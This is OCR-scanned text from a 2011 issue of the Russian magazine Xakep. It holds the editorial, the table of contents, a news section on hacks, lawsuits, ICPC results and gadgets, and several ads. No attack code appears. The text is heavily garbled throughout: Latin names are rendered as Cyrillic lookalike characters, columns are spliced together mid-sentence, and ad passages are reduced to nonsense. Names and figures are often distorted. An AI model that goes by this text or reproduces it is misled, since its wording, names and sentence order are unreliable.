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в” м т ру Е ИСПОЛЬЗОВАНИЕ АТАКИ ДЛЯ ОБХОДА 
ооге: создатель мМетазр!о! ОГРАНИЧЕНИЯ $ЗАМЕ ОВ!С/М РОГСУ 


Исследование трояна СепегаНоп Сагбегр 


аз 


ФОКУС-ГРУППА 


Хочешь не только читать журнал, но и вместе снами делать его лучше? Ука- 
зать на наши фейлы или выразить респект за сделанную работу? Зто легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки отжур- 
налаи наших партнеров. 


и ТЕ хаКер.ги №8 


Е 


3 самых активных участника фокус-группы получат в этом месяце подписки 
на журнал Хакер: за первое место — на 12 месяцев, за второе — на 6 месяцев 
иза третье — на 3 месяца. 


МТВО 


Есть ощущение, что этот год станет важной точкой в развитии 


российской м/ПКерва(-сцены. У нас огромная страна, и с хакерским 


генофондом полный порядок. Но вот незадача: на 142 млн. чело- 


век долгое время не было ни одной тематической конференции по 


информационной безопасности, в то время как даже в маленьких 


европейских странах такие конференции уже совсем не редкость. 


Ну и в целом активность российской публики пока очень скром- 
ная, ездят люди мало: не то что с докладом, а и в роли туриста на 
международные конференции кто-либо заезжает крайне редко. 
То же самое и с внутренней активностью. Люди как-то привычно 
общаются в электронном формате, и перехода этого общения в 
реальный мир всем явно недостает. 


Силами многих замечательных людей ситуация начинает поти- 
хоньку меняться, что лично мне очень приятно. Не успела 
отшуметь конференция РНО, как уже на носу очередной СВаоз 


Соп®гисНопс [27-28 августа в Питере]. Плюс наши питерские 
друзья-вайтхеты организовали первую в России ВЕЕСОМ-группу 
с понятным названием «ОЕЕСОМ-Кизза». Парни раз в месяц 
проводят встречи, которые сопровождаются хорошими техниче- 
скими докладами на тему |Т и информационной безопасности. 


Подробности тут: ВИр://Чесоп-гиз<а.ги. 


Люди — социальные существа, а вечно сидеть поодиночке за 
компьютерами — отстойная идея. Участвуя в офлайновых ивентах, 
ты встречаешь много разных и интересных людей, со многими из 
которых совершенно точно найдешь много общего. Все это благо- 
датная почва для общения, придумывания новых идей, ну и как 
минимум — просто гарантия хорошо проведенного времени. 


пККо22, гл. ред. Х 
укогцаКе.ги/хаКер_тад 
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МедаМем/$ 
004 — Все новое за последний месяц 


Реггит. 
016 ’Приветиз будущего! 

Тестирование монитора $атзипд эупсМа$ег Т2'7А950 
018 —Взвуках высоких сфер 


Тестирование акустических систем формата 2.0 


РС_2опе. 
024 — Шифрование для Огорбох 
Огорбох: синхронизация файлов - просто, но небезопасно 
028 — Путьдате-разработчика: 
отН(азп киграм для!РПопе 
Полмиллиона долларов на игре в Арроге 
032 Колонка редактора 
Про то, как блокировать китайцев 
033  Ргоо|-о1-Сопсер 
Рубрика об интересных идеях 


034 \\Мпдомс 7 Роща е 


Делаем загрузочную флешку с «семеркой» на борту 


Взлом. 
038 —Еаэу-Наск 
Хакерские секреты простых вещей 
042 — Обзор эксплоитов 
Анализ свеженьких уязвимостей 
048 — СОМНаепсе 2017 
Отчет о хакерской конференции в Польше из первых рук 
052 Позитивный СТЕ 
Описание конкурса Сар{иге ТВе [ад и интервью 
с организаторами РНПауз 
056 —Втораяжизнь ОМ Кебтато 
Свежий подход к реализации атак Апи ОМ$ рппитпа 
060 —Каксоздают0Оадау для браузеров 
Поискуязвимостей в современных браузерах 
спомощью фаззинга 
064 Анализ ТО 4 
Криминалистическая экспертиза и анализ 
руткит-программ на примере ТО 4 
066 СочцаНаскто 
Облачные вычисления на службе у пентестера 


072 Х-[оо[$ 


Программы для взлома 


МАЕМГАВЕ . 
074  Сепеганоп Сагбегр 


Изучаем все секреты трояна М/И п32/Тго]апОом/пюадег.СагЬегр 


080 — Мобильная малварь 
под микроскопом 


Рассматриваем «эротический» ./2МЕ-зловред 


во всех интимных подробностях 


Сцена. 
082 — НО Мооге 


О МаазроК и его создателе 


Юниксойд . 
086 Суперкомпьютер из видеокарты 
Задействуем возможности СРИ для ускорения софта 
092 Повелитель файлов 
1000 и один способ откатить и синхронизировать файлы 
098 Огненный щит 


Изучаем популярные надстройки для |р{аез 


Кодинг. 
102 \\№еб-приложения стурбонаддувом 
Фреймворк Корапа + шаблон проектирования М\УС = [оуе 
108 Спамим Ответы@Мац.Ки 
Используем невнимательность руководства 
паЦ.ги в своих целях 
112 $5М5-похититель для Апагоа 
5сприпа [ауегТог Апаго!а: интересная 
среда разработки для мобильного телефона 
116 —Программерскиетипсыитриксы 


Секреты МНОГОПОТоОчЧноСТи 


ЗУМ/АСК . 
120 Сетевой эскулап 

ЪСОМ: решение для мониторинга и диагностики систем 
124  ЕКР — налюбой вкус! 

Обзор ЕКР-систем: да, про Ореп 5оигсе мы тоже не забыли 
130 —Бронежилет 

для корпоративного пингвина 


5ЕЧпих: министерство обороны США рекомендует! 


РНВЕАКИМС . 
134 Электронный конструктор 


Обзор лучших 5Ме{9-плат для Агито 


Юниты 
140 РАСОМТЕО 


Большой ГАД 


143 Диско 
8.5 Гб всякой всячины 
144  \МЛЛМ? 


Удобные ммеб-сервисы 
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Втораяжизнь ОМ Кефпатод 


Свежий подход к реализации атак Апи ОМ5 рпптпа 
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 МЕСАМЕМ/5_ 


Мария «МИг[» Нефедова (тИгЦИагеа(.хаКер.ги] 


Мецапем$ 


ЗОЛОТО |СРС — НАШЕ! 


Обо всем _ 
за последний 
месяц 


именно тогда в стране начался переворот... В итоге, заключительный 
тур олимпиады имел место в США, в городе Орландо. Напоминаем, что 


Россию представляли 11 команд со всех уголков нашей страны. Первое 
место в этом году, увы, осталось за Китаем, чьи команды традиционно 
сильны — решить 8 задач быстрее и правильнее всех удалось ребятам 
изуниверситета Чжэцзян. На последующих местах турнирной таблицы 
расположились: 

® университет Мичигана, США [8 задач}; 

® университет Цинхуа, Китай [7 задач]; 

® Санкт-Петербургский государственный университет, Россия (7 задач}; 
® Нижегородский государственный университет, Россия (7 задач}; 

® Саратовский государственный университет, Россия [7 задач). 
Всехудивило столь блистательное выступление Мичигана, которое для 
многих стало настоящим сюрпризом, так какони не были даже в числе 
Уже традиционные новости о ходе международной студенческой олимпи- фаворитов. Что касается наших ребят, хоть они и не вошли в этом году в 
ады по программированию. Финал |СРС в этом году пришлось отложить, тройку, команды все равно заслужили золотые, серебряные и бронзовые 
ведьон должен был состояться весной в Шарм-эль-Шейхе (Египет), но медали, счем мы их искренне поздравляем! 


МисгозоН зесигКу Еззеп{а($ — наиболее используемый антивирус. Его 
используют на 10,66% из 43 000 компьютеров, протестированных ОРЗ\МАТ 
по всему миру. Это немного превышает результаты второго места, которое 
занял Амга Апмт Регзопа( с показателем 10,18%. Бесплатный антивирус АМАЗТ! 
оказался на третьем месте с 8,66%. 


СЕОНОТ НАШЕЛ РАБОТУ 


Интересное обновление появилось на стене Джорджа «СеоНо\» Хотца 

в Гасероок. Известный всей планете джейлбрейкер и активный борец 
скомпанией 5опу написал следующее: «Еасебоок — действительно 
потрясающее место для работы... первый хакерский марафон окончен» 
(«РасеБоок 1$ геаЦу ап ата7!тд р(асе {о \могК... г БасКа{Воп оуег»). В 
скором времени эта информация подтвердилась. Цукерберги компания 
действительно взяли эпатажного хакера на работу, притом довольно 
давно — Хотцс 9-го мая работает в ЕасеБоок как о \/аге епдтеег. То есть, 
крупнейшая социальная сеть планеты позвала беоНс{ на работу через 
месяц после его судебного разбирательства с 5опу. Чем конкретно за- 
нимается Хотц на новом месте пока неизвестно, но можно предположить, 
что его найм связан с планами компании выйти на мобильный рынок. В 
Гасебоок уже подтверждали ранее, чтоу них в разработке находится при- 
ложение для (Рад (удивительно, что его до сих пор нет}, и его релизуже не 
за горами. Вряд ли это совпадение, и известнейшего «яблочного» и не 


только джейлбрейкера взяли на работу в компанию не поэтому. 


> ООД ХАКЕР 08 /151/ 2011 


#35 ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ 
ВАШЕМУ ЗДОРОВЬЮ 


НА ВИТОКВЕМТ ПОДАЮТ В СУД 


Крайне неприятный судебный иск зарегистрирован в ноябре 2007 


был выдвинут против компании года, вто время как заявка на 


«ах г лал- ео 
# Мы бя Мави Ныйь Ось Ору КА 


ВиТоггепе. Товарищи из Тгап7- него подавалась еще в апреле 


1 ира Р.Р 1. 658 М ит кг. 


Зепа ВгоаЧ9сазтпа Ме\могкК наста- — 1999 года, то есть, за два года 


ивают, что ВИТоггеп пси Копик! до появления первой версии 


[пс нарушают патент 7.301.944 торрент-клиента ВиТоггег\. Если 


(«Распространение медиафайлов — Тгап2-5еп4 ВгоадсазНтд Ме\могК 


с использованием адаптивного сумеют доказать, что права на 


протокола передачи»] в реализа- технологию действительно были 


ции протокола ВКТоггег\. Эти на- запатентованы ими, а ВКТоггеп\ 


рушения якобы ведут к существен= заставят платить отчисления 


# Реска Ресе Роу — Ме 
а о от мым  БблаЛ 


ным потерям, и компания теперь за каждую загрузку, это может 


требует компенсации ущерба. нанести ущерб не только самой 
Что особенно важно — помимо компании, нои всем пользова- 


приложения иТоггепт, рассма- телям Р2Р-сетей в целом. Ведь 


тривается ущерб и отсоздания, получается, что в таком случае 


ФИЛ тЕ 


О4ЧТ, 252 пофез ры] 661 Мал Т: 5611 м8 


использования и распростра- даже само использование 


нения технологии ВИТоггеп{ как торрентов уже незаконно. Будем 


таковой! Упомянутый патент был следить за развитием ситуации. 


Сколько зарабатывают во «ВКонтакте»? Ежегодная выручка составляет 
» $8-9 млн, примерно 60% приходится на таргетированную рекламу. 
Тридцать процентов выручки приносят приложения, еще десять — остальные 

сервисы. 


РОЗЕТКА С УДАЛЕННЫМ ДОСТУПОМ 


В наше время «умный дом» — уже не пустые — ответные оповещения. Устройство способно 
слова и не оборот со страниц фантастиче- самостоятельно информировать «хозяина» 
ских романов. Это реальность. Все больше о включении или отключении электропри- 
бытовых приборов можно контролировать боров и резком изменении температуры 
удаленно, так что в скором времени, по- или достижении определенного предела 


жалуй, можно будет без шуток позвонить (поддерживается диапазон температур от 


» 


на холодильник или утюг :]. Нуа благодаря 
сотовым операторам теперь можно еще 

и посылать $М5 розетке. Уже начались 
продажи умной электророзетки с датчиком 
температур и дистанционным управлением 
«Мегафон С$51». Девайс, производителем 
которого является китайская компания 
Зепзе![Т, оснащается С5М-модулем с 
5|М-картой, так что им можно не только 
управлять и удаленно, но и получать от него 


-10 °С до 50 °С], что особенно актуально для 
владельцев кондиционеров. Интересно ито, 
что под девайс не придется штробить стены 
— 651 вставляется в обычную розетку, после 
чего у пользователя появляется возмож- 
ность дистанционно, с помощью мобильни- 
ка, управлять включением/выключением 
приборов и узнавать температуру в по- 
мещении. Цена новинки вместе старифом 
составляет 3 000 рублей. 


70% возвратов Апдгог-смартфонов происходит из-за низкокачественных 
приложении, заявляет Мофого(а. Большинство этих приложений не 


тестировалось, и влияние их на аккумуляторы и СРИ не оценивалось в полной 


мере. 
> 006 
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НМ О 


Яркий 


ЗИРЕВ АМОГЕВ Р!и$ 
гарантирует совершенную яркость цветов 


ЗОРЕН 


АМОЛЕО т 


СИА: 


Быстрый |’ 2%. 2 в, 


Двухъядерный процессор 1,2 Ггц 
задает новый уровень 
производительности 


Я 
| | 0 | КИ Толщина 8,49 мм 
ть определяет уникальный дизайн 


Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 
мил. затзипо.сот. Товар сертифицирован. Реклама. 
ЗИРЕВ АМОЕЕЙ Р!из — сверхъяркий экран высокого разрешения. ба!аху — Галактика. 


ВИРУСОПИСАТЕЛЕЙ В ЯПОНИИ БУДУТ САЖАТЬ 


Недавно парламент Японии одо- 
брил новый закон против кибер- 
преступности, согласно которому 
создание, хранение и распро- 
странение компьютерных вирусов 
теперь будет караться штрафом 
или лишением свободы. Теперь 

в стране восходящего солнца за 
умышленное создание или рас- 


пространение малвари будут штра- 


фовать на 500 тысяч иен [6,2 тыся- 
чи долларов] или приговаривать 
ктюремному заключению на срок 
дотрех лет. За хранение вирусов 
предусмотрен штраф в 300 тысяч 
иен [3,7 тысячи долларов] итюрем- 
ный срок до двух лет. Так как закон 
ожидаемо вызвал волну народного 
негодования, власти особенно 
подчеркнули, что закон был до- 


полнен резолюцией стребованием 


избегать злоупотреблений. Вто же 
время в Германии суд официально 


признал ООо$ уголовно наказуе- 
мым деянием. Суд Дюссельдорфа 
посчитал, что блокирование 
работы интернет-сайтов путем 

их преднамеренной перегрузки 
запросами запросто можетза- 
кончиться тюремным сроком — до 
десяти летлишения свободы. 
Такой приговор был вынесен еще 
в марте, когда слушалось дело о 
блокировке работы шести букме- 
керских сайтов, однако широкую 
огласку он получил лишь сейчас. 
Суд опирался на параграф 303 
уголовного кодекса [Германии 
(«компьютерный саботаж»)}, за ко- 
торый предусмотрено наказание в 
виделишения свободы на срок до 
десяти лет. Учитывая тот факт, что 
в Германии действует прецедент- 
ное право, ничего хорошего в 
будущем европейским ОПо5'ерам 
ожидать не стоит. 


НОВОВВЕДЕНИЯ &006ЕЕ 


Гоиг м/ау$ {о зеагсй Бу итазе 


Ога ап@ агор 


Про голосовой поиск от боод(е мы слышали уже давно, так как впервые 


Ирюад ап птазе 


его представили ещев 2009 году. Теперь боод(е Ус!се Зеагсй наконец- 


то официально доступен не только юзерам Апого!а, ут ап и 10$, но 


и пользователям браузера боод(е СВготе для персональных компью- 


теров. Да-да, без «Хрома» тут никуда, ведьтехнология, используемая 


в СВгогпе, является закрытой. Таким образом, судить о том, когда 


аналогичный функционал появится в других браузерах, пока довольно 


СЛОЖНО. 


Второе новшество, о котором компания боод(е объявила в середине 


июня — это поиск по изображениям. Привычный боод(е |падез теперь 


обладает функционалом схожим с ТтЕуе. То есть, отныне можно за- 


› 008 


Представили управления «К» сообщают: количество преступлений 
совершенных при помощи интернета в 2011 годууже выросло на 95%. 


Оо\иоад паре 
Сомипоад 1гпаре Ас... 


’ Заме паре 
бауе паре А$.., 


Сору апЧ разе {Пе ЦР Гогап 
итазе 


РА зНе-сИсК ап таре оп {пе 
\меБ 


грузить в поисковик картинку (или указать на изображение ссылку] и 
найти ее упоминание на различных веб-сайтах, отыскать похожие изо- 
бражения. Гакже можно будет распознавать здания по их фотографиям, 
музыкальные альбомы по их обложкам итак далее. Впрочем, распозна- 
вать лица людей новинка отказывается, что вполне объяснимо — до- 
статочно вспомнить, каким шквалом критики и обвинений в наруше- 
нии конфиденциальности и анонимности пользователей Сети была 
недавно встречена функция распознавания лиц на фото в Гасероок. 
Соод(е это нововведениетоже не одобрил, а Эрик Шмит (председатель 
совета директоров боод(е] заявил, что подобным «корпорация Добра» 
никогда заниматься не будет. 
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МЕХ ЕК.НОМЕ 703 


Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 

кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика КапаусгаН'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией захорошую цену. В случае 
СМИЕХЦЕВ.НОМЕ 903 с 64-битной М/п4ом/<® 7 на борту ты получаешь практически топовую 


машину, которая идеально подойдет для игр. 


Процессор ^^ >> => 

В качестве процессора используется мощный двухядерный процес- 
сор |п(е[® Соге"М 15-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРУ 
имеет встроенный контроллер памяти и поддерживает технологию 
Тигбо Вооз{, автоматически разгоняющую его под нагрузкой [напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 


Видео 


За игровые возможности отвечают две видеокарты СбеГогсе СТХ 460, 
основанные на новейшей вычислительной архитектуре «Гегпи». 
Благодаря высокой производительности в режиме ПОгесХ 11 тес- 
селяции процессор СТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий МУШЛА ЗВ 
\Мыюоп"м, РВузХ® и СУПАТМ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 


ОЗУ 


Компьютер \М/ЕХЕЕК.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 


«> ШехеСГ. 


с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 


Блок питания 


Набор мощного железа не может обойтись без надежного пита- 
ния. В \/ЕХЕЕКВ.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 


Софт 

На всех компьютерах \/ЕХЬЕК.НОМЕ 903 предустановлена операци- 
онная система \Л\Ипо\м/5® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус М!сгоо&® 
бесигцу Еззеп!а(5 и ОЁ#се 2010 Чакег (включает в себя ограничен- 
ный функционал \\/ога® и Ехсе[®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта]. 


у ® 


ПАОМ/' / 


Мы рекомендуем подлинную ОС \МИп4ом$® 7. 


ЗАО «БТК» — официальный дистрибутор 
техники М/ЕХЕЕК в России 

Единая служба поддержки М/ежег: 

+7 (800) 200-9660 

мимим.ммежег.ги 


© Владельцем товарного знака М!сгозо® и логотипа \\Ип4о\ми5® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 


на его дизайн является корпорация М!исгоо ®. 


РЕКЛАМА 


ДРАЙВЕРА НА АВТОМАТЕ 


Г 
Оемсе 
эресйсаНоп 
у 
ь 
бемсе-с1а55 
зресйесацоп 
А 
т Семса дпмег 
№, 
„__ 95 
зресйсавоп 


В ме[ [аб$, оказывается, вовсю кипит работа над созданием системы 
для автоматической генерации исходного кода драйверов устройств и 
их последующей адаптации для различных ОС. 06 этом стало известно 
из интервью сАруном Рагхунатом, который является одним из раз- 


работчиков этого чуда мысли. Технология пока носит название Тегт\е 
и призвана автоматизировать труд программистов, помочь людям 
избежать возможных ошибок в коде за счет автоматизации их работы 

с помощью алгоритмов, используемых при создании систем искус- 
ственного интеллекта. Алгоритм работы Тегт\е основан на методах 
«теории игр». Драйвер выступает в роли первого игрока, а остальное 
окружение, к которому можно причислить ОС и устройство, — второго. 
Рагхунат поясняет: «Когда драйвер делает ход, окружение тоже меняет 
свое состояние. Выигрышная стратегия состоит в том, чтобы делать 
ходы по игровому полю таким образом, чтобы не ввести окружение в 
противоречивое или тупиковое состояние». Плюс этого подхода вего 
универсальности, можно перенести сгенерированный драйвер в дру- 
гую операционку, и для этого не потребуется ничего, кроме корректных 
спецификаций интерфейса драйверов для этой ОС. Данная технология 
была представлена впервые разработчиками из австралийского ис- 
следовательского центра М!СТА, Ореп Кегпе! [аб $ и исследователями 
из университета Нового Южного Уэльса на симпозиуме 50$Р. С их 
подробным докладом по данному вопросу можно ознакомиться здесь: 


Е. уго За. 


Спустя два года после запуска, количество пользователей 
геолокационного сервиса Гоигзаиаге превысило 10 млн человек. 


ПЯТИМИНУТКА «ЯБЛОЧНЫХ» НОВОСТЕЙ 


ний, и на устройство стало возможно установить 
любую программу. Когда будетвыпущен джейл- 
брейк, пока не сообщается, но в качестве дока- 
зательств взломщики опубликовали скриншоты 
домашнего экрана 05 на плеере Ро@Тоиср. 
Среди стандартных иконок были иконки при- 
ложений Суда и'ЪЗЪН. Последнее дает корневой 
доступ к файловой системе. 

В-третьих, об одной очень интересной 
инициативе рассказал Стив Джобс. В Арр(е 
придумали, как можно монетизировать 
«пиратскую» музыку. Возможным это стало 
благодаря новому сервису !Типе$ Ма{сп. 

Суть проста: новая функция $сап-ап9-та{сВ 
(сканируй и найди] в Типез поместит копии 
песен из библиотек пользователей в облако, 
где можно хранить треки всего за $25 в год 

и прослушивать их на любом устройстве. И 
неважно, откуда взялись эти песни — были 


Немало интересных сообщений пришло за 
прошедший месяц из стана компании Арр(е. 
Во-первых, была названа дата выхода нового 
поколения операционной системы Мас 05 Х 
под кодовым названием Чоп. Старт произой- 
дет вуже втекущем месяце. ОС будет распро- 
страняться только через МасАрр З{оге по цене 
29,99 долларов. Нововведений много — более 
250 новых функций, многие из которых, кстати, 
были позаимствованы из мобильной 105. Вот 
некоторые их них: появилась поддержка новых 
мультитач-жестов и полноэкранных приложе- 


> 010 


ний. Были добавлены функция М!5$1оп Соп{го| 
для просмотра запущенных на компьютере 
программ в одном окне и панель [аупсйрад. 
ОС интегрировалась с магазином приложений 
МасАрр З{оге. Появилась утилита АтОгор для 
быстрого обмена файлами с другими компью- 
терами Мас по беспроводной сети. 

Во-вторых, неуспел Арр(е опубликовать бета- 
версию 105 5, какее уже взломали. На джейл- 
брейкушло менее 24 часов! Авторство рекорда 
принадлежит !РПопе Оеу Теат. Парни сумели 
обойти систему цифровых подписей приложе- 


ли они приобретены в 'Типез, извлечены из 
СР или скачаны с файлообменных сетей. 
«Это приводит к созданию модели, которая 
позволитлюдям делать деньги на пиратской 
музыке», — заявил Джефф Прайс, основа- 
тель и генеральный директор независимого 
музыкального дистрибьютора ГипеСоге. В 
общем и целом, это действительно похоже на 
схему, где «и волки сыты и овцы целы». Но, к 
сожалению, сомнительно, чтобы все борцы 
за авторское право так же обрадовались этой 
инновации. 
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МолОК 


> традиция еврейского народа. В ее основележат т Несколько заповедей ) —. | 
ый Из Торы. В том числе, относящиеся к здоровью животных. | \-. к о 
т т Ученые изучали и применяли Законы кашрута на протяжении трёх ТЫСЯЧ лет. И а } 
мы различных национальностей и вероисповеданий доверяют ол. 
качеству кошерных продуктов. Во многих странах мира, кошерные ^ и — о — О 
”_ продукты питания считаются более качественными — Из -за строгого ® | — х ое 
‚контроля и дополнительных м по гигиене. ие добавкам — 
и применению химических. веществ. О а и 
_ Идеологическую основу кошерного питания прекрасно передает. а, — 
` поговорка "мы — это то; что мы едим". Отеды напрямую зависит т. й мо 
‚| Нашездоровье и долголетие. А также состояние ира ЯСНОСТЬ, МЫСЛИ, лы 
а 


На правах рекламы — __ 


м ды ` | А мы \ Вы , К \ о“ 


У МОКИА ТЕПЕРЬ ЕСТЬ СВОЯ «АСЬКА» 


Глввная страници 


Я 
В < ыНая ТОР ВАМИ. 

лкопоньь треть Фнлепраыя Пъебхьр вне жире ГАБОН На 
А Гаг НокЕа - СъаЕ оп Ве: фо 


Сы АЕ КОНЕтоп Соенозрыи Га. Победит: ФРове Ббтиаречераи, Р БРНО ААеонанеоун 
т В О 
лан Газпь алии ВЕ вы рый $ иене Рыень в ва ны 9 бананы ГЫ 


Петин Бат Кроеельй гор ЫЙ ИЯ кея вай тес пеРТНеЕТЕ Ко а Нины № 


Кол Бреееае БАР ЕЬ. РУБ ий ро т Рем ЗНСРЬЕИ Ка темы Ви ЕЯ 
р а Е 
Че в гы ля ори 


Компания МокКта, чей недавний альянсс 
Мтсго5ов потряс многих, выпустила бес- 


мессенджер также поддерживает бооц(е 
Та(К, МИпдом/з ме Меззепдег, Уапоо! 


грамма ориентирована на смартфоны 
Мок!а Хб, Мокга 5230, Мока №8, МоК!а Е”, 
Бена аппараты 5епез 40 и ряд других моделей 
компании. Скачать новинку можно через 
магазин Ом! З{оге. Разумеется, софтина 
не будет представлять собой закры- 
тый способ связи «только для нокий», 


платный мессенджер М Тог МоКа. Про- 


Мез5епдеги другие сервисы обмена 
мгновенными сообщениями. Однако, 
похоже, это первый шагв направлении, 
сходном с «яблочным» 1Мез5аде. При 
помощи этого приложения владельцы 
устройств с!05$ 5 на борту смогут обме- 
ниваться текстовыми сообщениями, 
фотографиями и видеороликами. 


Корпорация [САММ проголосовала за разрешение введения доменных 
имен верхнего уровня, совпадающих с названием торговой марки. 
То есть, зоны вроде ‚арр(е, или 16т не за горами. 


ХАКТИВИЗМ 


и 
= < 


> 

ь 
ыы 
>. ч 


И 
5” ИГ ИРА 
вых д 


Карательные операции хакеров против 
компании 5опу словно послужили сигналом к 
действию для десятков, если не сотен, других 
хактивистов по всему миру. За последние ме- 
сяцы сообщения о взломах резко участились, и 
все чаще ответственность за хаки берут на себя 


КРЕПЧАЕТ 


различные группировки. Если абстрагировать- 
ся от многострадальной 5опу (которую до сих 
пор не оставили в покое}, то самыми громкими 
взломами последнего месяца можно назвать 
хак сервиса $еда Ра$ и взлом сайта НАТО. 

В первом случае были скомпрометированы 
данные более 1,3 миллиона пользователей 
игрового онлайн-сервиса 5еда Раз$. Сервис 
отключили, обнаружив, что неизвестные 

лица сумели получить доступ к базе данных. 
Какая именно информация могла попасть 

в руки злоумышленников, пока не до конца 
ясно, но уже известно, что хакерам удалось 
получить ета( юзеров, их даты рождения и 
пароли [в зашифрованном виде]. Интересно 

и то, что другая группировка хактивистов под 
названием | и[75ес, о деяниях которой мы 
обязательно расскажем тебе подробно в бли- 
жайшем номере, вызвалась помочь 5еда найти 


ПЛАНШЕТ ДЛЯ СИСАДМИНОВ 


Необычное устройство представила компа- 

ния Е уке Мемогк$. Планшетник Ори\ем/ 

ХС Меймлогк Апа(з15 Та {е{ ориентирован 

на сетевых инженеров и предназначен для 
решения серьезных задач. Новинка оснащается 
специализированным аппаратным комплек- 
сом для автоматизированного анализа сети и 
приложений. Барри Линдслей, менеджер по 
маркетингу компании ЕиКе Мемогк$, поясняет, 
что данное устройство призвано помочь сете- 
вым администраторам определить, где именно 
имеется неисправность в данный момент: в 
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сети или науровне приложений. Производитель 
утверждает, что на сегодня нет другого девайса, 
который сочетал бы в себе способность произ- 
водить анализ сетей 10 Гбит, атакже мониторинг 
и анализ беспроводных сетей. Аппарат весит 

2,5 кг, имеет 10,25-дюймовый экран разреше- 
нием 1024х738, время его работы — три часа 
отдвух батарей, заменяемых без выключения 
компьютера. Система работает на операционной 
системе \\Ипдом/® 7, процессор ще! Соге Оио 1,2 
ГГц. Ори\МемиХб способен контролировать до 30 
000 конечных устройств в сети и обрабатывать 


взломщиков. [1и[75ес, сами только взломав- 
шие Веезда, Ми{епдо, сайт ЦРУ, сайт Сената 
США итак далее, заявили, что они оченьлюбят 
Огеатсаз{ и хотят помочь. Хотя, вероятно, это 
заявление тоже было сделано исключительно 
ради лулзов. 

Во втором случае пострадал сайт НАТО, а 
именно МАТО Е-Воок$Вор. Учитывая, что 
меньше месяца назад НАТО недвусмыслен- 
но угрожали анонимусы, обещая страшные 
кары, совпадение любопытное. 0 взломе 
стало известно, когда пользователей сервиса 
Е-Воок$Пор оповестили, что хакеры, возмож- 
но, сумели заполучить клиентскую базу, и по- 
просили всех сменить пароли. Нотак как сайт 
не содержит никаких конфиденциальных или 
секретных данных, многие полагают, что цель 
для анонима была мелковата. Известно также, 
что НАТО ломали через Х$5. 


пакеты до 10 Гбит/с. Информационной панелью, 
отображающей основные данные, можно 
управляться и изменять ее в зависимости от 
требований пользователя. 
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БИРЖУ ЦИФРОВОЙ ВАЛЮТЫ ВИТСОМ ВЗЛОМАЛИ 
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Мы довольно давно рассказывали тебе о цифровой валюте Ви со!т, 
основанной на реег-{о-реег-технологии. Ее автор Сатоши Никамото хотел 
создать валюту, на которую не имела бы влияния ни политика банков, ни 


какие-либо внешние факторы. Увы, некоторые факторы на Вксо!п все же 
влияют. Например, хаки. Недавно был взломан крупнейший обменник 
ВС в Сети — М(бох, именно через него проходил основной объем торгов. 
Хакерам удалось «угнать» базу пользователей М\бох (а это более 60 тысяч 
аккаунтов}, включая хэши паролей в формате МОБ. Известно, что пароль 
какминимум кодному изаккаунтов был подобран, и атакующие совершили 
отимени данного юзера операцию на бирже (максимальный размер пере- 
вода ограничен 1000 долларами в день. Также после взлома, по каким-то 
неясным причинам, временно рухнул курс биткоинов: на бирже М{бохон 
упалс $17 до нескольких центов. Впрочем, сейчас курс в полном порядке, и 
это, видимо, можно списать на некиетехнические неполадки. Интересно, 
что после взломатакже была выявлена аномальная внешняя транзакция 
размером 432 тысячи ВС, что равняется примерно $8 млн и составляет 6,6% 
отобщего числа доступных в обороте биткоинов. С одной стороны, все это 
никоим образом нельзя поставить вупрек самой валюте. С другой, кВ со!п 
достаточно вопросов и без этого инцидента. К примеру, ВС используется 
в качестве виртуальныхакций финансовой пирамиды МММ-2011, и из- 
вестно, что курс валюты искусственно завышен ивлюбой момент можетоб- 
рушиться. Известно также, что существуюттрояны (в частности пю$еа(ег. 
СотЬ\ для кражи кошельков Висогт, и ботнеты, позволяющие зарабаты- 
вать валюту В®согп. Словом, хитрая криптография не защищаетнеобычную 
цифровую валюту отмошенников, адырявые биржи, вынужденные прово- 
дить откаты и затыкать дыры, точно не принесутей хорошей рекламы. 


ИЩУТ ДАВНО, НО НЕ МОГУТ НАЙТИ... 


Компания Мисго5о{ совсем недавно расквиталась с огромным ботнетом 
Киоск, атеперь намеревается осудить его хозяев. Однако для начала 
ихеще нужно найти. Тот факт, что личности организаторов зомби-сети 
установлены не были, не остановил М!сго5о{ от подачи судебного иска. 
Проведенное компанией расследование показало, что следы спамеров 
(ботнет рассылал миллиарды сообщений ежедневно, чаще всего ихтемой 
были фэйковые лотереи и фарма] ведут в Россию. Атак как американское 
законодательство требует проинформировать ответчика о дате и месте 
слушания, М!сгозой разместила в российских газетах «Деловой Петер- 
бург» и «Московские новости» объявления с датой, местом и временем 
проведения слушаний по делу ботсети Киоск. Реклама начетверть 


До 149,4 млн в конце). 


ЕЩЕ ОДНО ВСКРЫТИЕ ЗКУРЕ 


Закрытый протокол 5Куре словно запретный плод — он все манит 

и манит исследователей. Пока все гадают, выдастли М!сго$ой ис- 
ходный код проекта спецслужбам (в рамках программы боуегптеп\ 
бесигЦу Ргодгапт) после приобретения проекта, независимые ис- 
следователи выкладывают в Сеть свои наработки. Гридцатилетний 
фрилансер Ефим Бушманов из Сыктывкара разместил в своем блоге 
